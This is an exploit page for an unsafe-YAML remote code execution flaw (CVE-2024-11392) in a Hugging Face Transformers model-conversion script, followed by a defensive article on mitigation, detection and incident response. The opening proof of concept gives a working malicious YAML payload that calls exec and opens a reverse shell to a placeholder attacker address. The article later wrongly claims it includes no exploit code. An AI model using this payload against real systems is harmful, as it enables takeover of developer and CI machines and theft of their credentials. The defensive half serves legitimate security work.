Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)

Exploit Author: The Kernel Panic Analysis Author: www.bubbleslearn.ir Category: Remote Language: Python Published Date: 2025-04-16

# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
# Date: 29-11-2024
# Exploit Author: The Kernel Panic
# Vendor Homepage: https://huggingface.co/
# Software Link: https://github.com/huggingface/transformers/releases
# Version: 4.41.1
# Tested on: Linux, Windows, Mac
# CVE : CVE-2024-11392


# Code flow from input to the vulnerable condition:
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.


# POC

# Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below.
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.

!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"


# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path 

> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or

# Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script.

Hugging Face Transformers MobileViTV2 4.41.1 — Remote Code Execution (CVE-2024-11392)

This article explains the Remote Code Execution (RCE) vulnerability reported for the Hugging Face Transformers MobileViTV2 conversion utilities (tracked as CVE-2024-11392). It covers the root cause, impact, safe mitigations, secure coding patterns, detection guidance, and incident response recommendations. The goal is to help teams safely operate model-conversion tooling and prevent supply-chain and deserialization abuses.

Executive summary

Some model conversion utilities in older Transformers releases accepted and deserialized untrusted configuration files using unsafe YAML/object loaders. An attacker who can supply a crafted configuration file that will be loaded by the conversion script can trigger arbitrary code execution in the context of the user running the conversion. This class of vulnerability is high-risk: conversion is commonly run by developers, CI jobs, or automated pipelines that may have access to sensitive credentials or elevated privileges.

Affected component and scope

Component: Transformers model conversion utilities that accept YAML (or other serialized) configuration files and perform deserialization without restrictions.
Likely impacted version: 4.41.1 (as reported). Any workflow that loads third‑party model configuration files with unsafe deserializers is potentially vulnerable.
Platforms: Linux, Windows, macOS — vulnerability is language/runtime agnostic as it relies on deserialization semantics.

Root cause

The vulnerability is rooted in unsafe deserialization. Some YAML loaders (and Python's pickle or object constructors) allow deserializing data that instantiates arbitrary Python objects and executes code during construction. If a conversion script calls yaml.load (or otherwise uses object construction via YAML tags) with a loader that permits arbitrary Python object creation, a malicious configuration file can cause the interpreter to execute arbitrary code.

Why this is dangerous

Arbitrary code execution in conversion tooling can give attackers the same privileges as the user who ran the tool.
These utilities are often used in build automation, CI, or on machines that hold credentials (e.g., tokens, SSH keys), increasing the blast radius.
Model artifacts are frequently obtained from third-party sources. Without integrity checks and safe parsing, model pipelines become an attack vector.

High-level proof-of-concept (safer description)

At a high level, the issue occurs when a conversion script loads a model's configuration from a YAML file using an unsafe loader that permits Python object construction. A specially crafted configuration file can exploit the loader to run code during deserialization. For safety reasons this article does not include exploit code or step‑by‑step reproduction instructions. Instead, focus on the mitigations below.

Impact

Remote or local attackers who can supply a configuration file to a conversion run may execute arbitrary commands.
Potential outcomes include credential theft, lateral movement, data exfiltration, and persistence.
Severity: high — as this allows arbitrary code execution with the privileges of the conversion process.

Short-term mitigations (immediate actions)

Stop loading untrusted configuration files with the affected tool until you can patch or enforce safe loading.
Run conversion steps in isolated environments: containers, ephemeral VMs, or sandboxed processes with network disabled where feasible.
Ensure conversions are run by a dedicated, unprivileged user account with minimal permissions (principle of least privilege).
Block or closely monitor outbound network traffic from build/conversion hosts.
Verify checksums and provenance of model files before using them in conversion pipelines.

Patches and permanent fixes

Upgrade to a patched version of the Transformers library as soon as a vendor patch is released. Monitor official project advisories and release notes for the exact patched versions (the vendor will publish the fix and specific version numbers).
If you cannot upgrade immediately, modify conversion scripts to use safe deserialization (see code examples below).
Enforce validation/schemas for configuration files so only expected keys and primitive types are accepted.

Secure coding patterns — safe YAML loading

Replace unsafe usage of yaml.load or other object-creating loaders with safe alternatives that only produce primitive Python types (dict, list, strings, numbers).

import yaml
from yaml import SafeLoader

with open("model_config.yaml", "r", encoding="utf-8") as f:
    config = yaml.load(f, Loader=SafeLoader)

Explanation: yaml.load with SafeLoader (or yaml.safe_load) prevents construction of arbitrary Python objects and limits parsed output to basic data structures. Use SafeLoader/safe_load whenever reading YAML from untrusted or third-party sources.

# alternative with explicit safe function
import yaml

with open("model_config.yaml", "r", encoding="utf-8") as f:
    config = yaml.safe_load(f)

Explanation: yaml.safe_load is equivalent to using SafeLoader; it is the recommended default for untrusted YAML content.

# ruamel.yaml safe loading
from ruamel.yaml import YAML
yaml = YAML(typ="safe")
with open("model_config.yaml", "r", encoding="utf-8") as f:
    config = yaml.load(f)

Explanation: ruamel.yaml supports safe loading when typ="safe". ruamel can be preferable when preserving comments/formatting is needed by tooling.

Schema validation and whitelisting

After parsing with a safe loader, validate the configuration against a strict schema (e.g., JSON Schema) to ensure only expected keys and types are present. This prevents malicious data from passing downstream checks.

from jsonschema import validate, ValidationError

schema = {
  "type": "object",
  "properties": {
    "model_name": {"type": "string"},
    "input_size": {"type": "integer"},
    "num_classes": {"type": "integer"}
  },
  "required": ["model_name"],
  "additionalProperties": False
}

try:
    validate(instance=config, schema=schema)
except ValidationError as e:
    raise RuntimeError("Invalid model config") from e

Explanation: This code validates that the config only contains allowed fields and types. additionalProperties=False rejects unexpected keys.

Hardening model-conversion pipelines (operational controls)

Run conversions in ephemeral containers or sandboxed VMs with no access to sensitive host mounts.
Use network segmentation and deny egress for build/convert agents unless strictly required.
Run conversion steps as an unprivileged user; do not run them as root/Administrator in CI.
Pin and verify third-party artifacts with signatures or checksums; fetch models from trusted registries only.
Add automated scanning in CI for uses of unsafe deserializers (e.g., grep for yaml.load without SafeLoader, pickle.loads on untrusted inputs).

Detection & hunting guidance

To detect exploitation attempts and compromised hosts, prioritize these indicators and logs:

Search repositories and CI config for usages of yaml.load / pickle.loads / yaml.unsafe_load without SafeLoader.
Audit logs and command histories for conversion script runs that referenced third-party model config files or unusual file paths.
Network monitoring: unexpected outbound connections from developer or CI hosts to unfamiliar IPs or domains at times of conversion runs.
Process monitoring: suspicious child processes spawned by conversion commands (shell spawns, reverse-shell-like processes).
File system changes: new crontabs, new persistence artifacts, or unexpected binaries appearing after conversion runs.

Incident response checklist (if you suspect compromise)

Immediately isolate the affected host(s) from the network.
Preserve volatile data: capture memory, running processes, and current network connections for forensic analysis.
Collect relevant logs (system logs, application logs, CI logs) and the configuration files involved in the conversion run.
Rotate credentials and tokens that may have been accessible to the compromised process or CI runner.
Rebuild compromised build agents from clean images; do not trust a re-used host unless fully validated.
Perform a thorough review of artifacts produced during the window of exposure and revoke or re-validate any model artifacts published from that period.

Developer & maintainer recommendations

Library maintainers: avoid using YAML loaders that allow Python object construction by default. Prefer yaml.safe_load and document safe patterns in the project README and examples.
Package consumers: treat model configuration and artifacts as untrusted inputs unless they are cryptographically verified.
CI owners: run static checks to detect use of unsafe deserialization functions and disallow them in pipelines that process external files.
Organizations: introduce an artifact signing policy for third-party models (e.g., sign / checksum artifacts in a registry). Verify signatures prior to ingestion.

Example remediation patch (illustrative)

# Before (unsafe)
import yaml
with open(cfg_path) as f:
    cfg = yaml.load(f)   # unsafe if default loader permits object construction

# After (safe)
import yaml
from yaml import SafeLoader
with open(cfg_path) as f:
    cfg = yaml.load(f, Loader=SafeLoader)

Explanation: The change explicitly uses SafeLoader, preventing creation of arbitrary Python objects during YAML parsing. Projects should prefer this pattern or yaml.safe_load and follow with schema validation.

Summary table: risk vs. mitigation

Risk	Mitigation
Arbitrary code execution via crafted config	Use safe YAML loaders; validate schemas; run conversions in sandboxed, unprivileged environments
Compromise of build/CI credentials	Limit agent permissions; rotate credentials; restrict network egress
Supply-chain poisoning of models	Verify artifact provenance and signatures; pin trusted sources

Final notes and best practices

Treat all serialized inputs (YAML, pickle, custom object tags) from third parties as hostile until proven safe.
Adopt defense-in-depth: safe parsing, schema validation, sandboxing, and artifact verification together reduce risk significantly.
Keep Transformers and related tooling up to date and subscribe to vendor advisories for security patches and mitigation guidance.

For teams that maintain model ingestion pipelines, now is a good time to review deserialization patterns across your codebase, add CI checks blocking unsafe deserialization, and to harden conversion steps by default.